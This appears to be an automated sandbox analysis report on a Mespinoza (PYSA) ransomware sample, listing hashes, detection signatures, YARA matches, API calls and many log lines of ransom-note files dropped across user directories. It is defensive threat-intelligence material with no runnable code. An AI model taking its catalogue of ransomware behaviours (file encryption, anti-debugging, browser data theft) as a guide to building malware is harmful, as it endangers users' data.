Analysis Report 6hFKK8UQi7.bin

Overview

General Information

Sample Name: 6hFKK8UQi7.bin (renamed file extension from bin to exe)
Analysis ID: 322355
MD5: b6dd099b4c51edae5ea0c867ff2f12a7
SHA1: f13800d747ca3d79785f373af3ce098a0298a6d7
SHA256: f0939ebfda6b30a330a00c57497038a54da359e316e0d6e6e71871fd50fec16a
Tags: Mespinoza, PYSA, ransomware

Detection

Mespinoza
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mespinoza ransomware
Creates files in the recycle bin to hide itself
Modifies existing user documents (likely ransomware behavior)
Tries to harvest and steal browser information (history, passwords, etc)
Writes many files with high entropy
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
Installs a Chrome extension
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • 6hFKK8UQi7.exe (PID: 3412 cmdline: 'C:\Users\user\Desktop\6hFKK8UQi7.exe' MD5: B6DD099B4C51EDAE5EA0C867FF2F12A7)
    • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • OpenWith.exe (PID: 6716 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: D179D03728E95E040A889F760C1FC402)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
6hFKK8UQi7.exe | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.470657904.0000000000AEA000.00000004.00000020.sdmp | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |
00000000.00000000.205056782.000000000141A000.00000002.00020000.sdmp | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |
00000000.00000003.287795640.0000000000B0B000.00000004.00000001.sdmp | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |
00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |
Process Memory Space: 6hFKK8UQi7.exe PID: 3412 | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.0.6hFKK8UQi7.exe.13c0000.0.unpack | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |
0.2.6hFKK8UQi7.exe.13c0000.0.unpack | JoeSecurity_Mespinoza | Yara detected Mespinoza ransomware | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 6hFKK8UQi7.exe, Avira: detected
Multi AV Scanner detection for submitted file
Source: 6hFKK8UQi7.exe, Virustotal: Detection: 52%
Source: 6hFKK8UQi7.exe, ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013EA350 CryptGenRandom,__CxxThrowException@8
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013EA3F0 new,CryptReleaseContext
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013EA4F0 CryptReleaseContext
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013E9FC0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013EA130 CryptAcquireContextA,GetLastError
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013EA310 CryptReleaseContext
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013EA2F1 CryptReleaseContext
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_01418BB1 CryptReleaseContext
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013C9500 wsprintfW,FindFirstFileW,wsprintfW,_wcsstr,_wcsstr,FindNextFileW,FindClose,_wcsstr
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_0140C916 FindFirstFileExA
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Code function: 0_2_013C8F21 __EH_prolog3_GS,GetLogicalDriveStringsW,GetDriveTypeW
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, File created: C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Readme.README

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Mespinoza ransomware
Source: Yara match, File source: 6hFKK8UQi7.exe, type: SAMPLE
Source: Yara match, File source: 00000000.00000002.470657904.0000000000AEA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000000.205056782.000000000141A000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.287795640.0000000000B0B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: 6hFKK8UQi7.exe PID: 3412, type: MEMORY
Source: Yara match, File source: 0.0.6hFKK8UQi7.exe.13c0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.6hFKK8UQi7.exe.13c0000.0.unpack, type: UNPACKEDPE
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, File moved: C:\Users\user\Desktop\QCFWYSKMHA\QCFWYSKMHA.docx
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, File moved: C:\Users\user\Desktop\QNCYCDFIJJ.pdf
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, File moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, File moved: C:\Users\user\Desktop\QCFWYSKMHA\EEGWXUHVUG.pdf
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, File moved: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx
Writes many files with high entropy
Source: C:\Users\user\Desktop\6hFKK8UQi7.exe, Process Stats: CPU usage > 98%
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Code function: String function: 013F243E appears 36 times
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Code function: String function: 013F47A8 appears 67 times
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Code function: String function: 013F26C2 appears 81 times
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Code function: String function: 013F3660 appears 51 times
                  Source: classification engine | Classification label: mal80.rans.spyw.evad.winEXE@3/1025@0/0
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Mutant created: \Sessions\1\BaseNamedObjects\Pysa
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | File created: C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Readme.README
                  Source: 6hFKK8UQi7.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: 6hFKK8UQi7.exe | Virustotal: Detection: 52%
                  Source: 6hFKK8UQi7.exe | ReversingLabs: Detection: 68%
                  Source: unknown | Process created: C:\Users\user\Desktop\6hFKK8UQi7.exe 'C:\Users\user\Desktop\6hFKK8UQi7.exe'
                  Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: C:\Windows\System32\OpenWith.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: 6hFKK8UQi7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 6hFKK8UQi7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 6hFKK8UQi7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 6hFKK8UQi7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 6hFKK8UQi7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 6hFKK8UQi7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 6hFKK8UQi7.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: 6hFKK8UQi7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 6hFKK8UQi7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 6hFKK8UQi7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 6hFKK8UQi7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 6hFKK8UQi7.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Code function: 0_2_013F269C push ecx; ret 0_2_013F26AF
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exe | Code function: 0_2_013F36A6 push ecx; ret 0_2_013F36B9
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_TW\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_metadata\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ar\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\bg\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ca\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\cs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\da\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\de\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\el\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_GB\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\en_US\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\es\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\et\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\eu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fil\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\fr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\he\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\hu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\id\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\it\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ja\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ko\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lt\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\lv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ms\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\nl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\no\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_BR\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\pt_PT\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ro\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\ru\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sl\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\sv\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\th\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\tr\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\uk\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\vi\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_CN\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\zh_TW\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_locales\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.2_0\_metadata\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessibility\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Accessories\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Extras\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\AutoIt v3\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\Readme.READMEJump to behavior
                  Source: C:\Users\user\Desktop\6hFKK8UQi7.exeFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\Readme.READMEJump to behavior
